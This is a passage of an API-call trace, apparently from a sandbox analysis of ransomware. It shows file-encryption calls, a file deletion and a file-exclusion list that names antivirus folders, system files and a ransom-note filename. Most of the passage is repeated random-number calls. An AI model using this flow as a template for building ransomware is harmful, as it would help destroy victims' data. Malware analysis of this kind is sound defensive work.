lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADF4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadf4.tmp"), dwFlags=0x1) returned 0 [0146.198] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXADF4.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxadf4.tmp")) returned 1 [0146.199] CryptDestroyKey (hKey=0x9ad578) returned 1 [0146.199] wcslen (_String="OK") returned 0x2 [0146.199] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.199] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.199] CryptDestroyKey (hKey=0x9ad438) returned 1 [0146.199] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0146.199] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0146.199] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*NMCRYPT") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*Recovers your files.html") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.exe") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.dll") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.lnk") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.bat") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.ini") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.msi") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*.scf") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*pagefile.sys*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*AppData*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\winrar\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\java\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\windows\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\ESET\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\AVG\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*Atheros*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*Realtek*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*bootmgr*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*boot*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*boot*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.199] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*IO.SYS*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*ntldr*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*chrome*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*opera*") returned 0 [0146.200] PathMatchSpecW (pszFile="ipscsy.xml", pszSpec="*firefox*") returned 0 [0146.200] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipscsy.xml", pszSpec="*") returned 1 [0146.200] strlen (_Str="NMoreira") returned 0x8 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.200] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.201] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.202] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.203] 